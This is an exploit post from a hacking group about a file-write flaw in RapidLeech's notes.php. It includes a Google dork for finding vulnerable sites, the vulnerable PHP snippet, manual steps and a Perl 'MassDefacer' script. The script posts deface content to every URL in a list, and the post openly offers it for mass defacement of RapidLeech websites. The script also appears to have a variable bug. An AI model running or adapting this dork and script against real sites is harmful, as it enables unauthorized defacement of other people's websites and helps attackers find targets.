[+] Author: Iranian_Dark_Coders_Team [+] Home: WwW.IDC-TeaM.NeT [+] Exploit Title: RapidLeech Local File Edit Vulnerability [+] Date: 04-02-2013 [+] Category: WebApp [+] Google Dork: intitle:"Rapidleech v2 rev. 42" - inurl:"index.php?debug=1" [+] Tested on: Ubuntu 12.10 [+] Discovered By : M.R.S.CO ################################## source of bug : var/www/notes.php if (isset($_POST['notes']) && $_POST['notes']) { file_put_contents("files/".lang(327).".txt",$_POST['notes']); } ################################## vulnerability Concept: file_put_contents() + $_POST['notes'] = Local File Edit ################################## 1 . start 2 . go to http://site.com/notes.php 3 . Write Your text in TextArea 4 . now you can view your text in this path http://site.com/files/notes.txt or http://site.com/files/Notes.txt 5 . end or you can help from this exploit for mass deface rapidleech websites ################################## ##start perl code #RapidLeech MassDefacer #Coded By M.R.S.CO #We Are M.R.S.CO,N3O,UB313 #Friends : G3n3Rall,BlacK.King,Nafsh,b3hz4d,Black.Hack3r use HTTP::Request::Common qw(POST); use LWP::UserAgent; $ua = LWP::UserAgent ->new; $ua->timeout(15); system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print q ( ------------------------------ | Iranian Dark Coders Team | ------------------------------ | WwW.IDC-TeaM.NeT | ------------------------------ | Coded BY M.R.S.CO | ------------------------------ Usage : perl idc.pl urls_file Deface_file Example : perl idc.pl urls.txt def.txt ); if($ARGV[1]) { open(file1, $ARGV[1]) || print "Couldn't open ".$ARGV[1]."\n"; my @f =<file1>; open(file, $ARGV[0]) || print "Couldn't open ".$ARGV[0]."\n"; my @tt =<file>; foreach $url(@tt){ chomp($url); $url1=$url."/notes.php"; my $req = POST $url1, [ 'notes'=> $f, 'submit'=> "Save+Notes" ]; $content = $ua->request($req)->as_string; print $url."/files/Notes.txt\n"; }} ##end perl code ##################################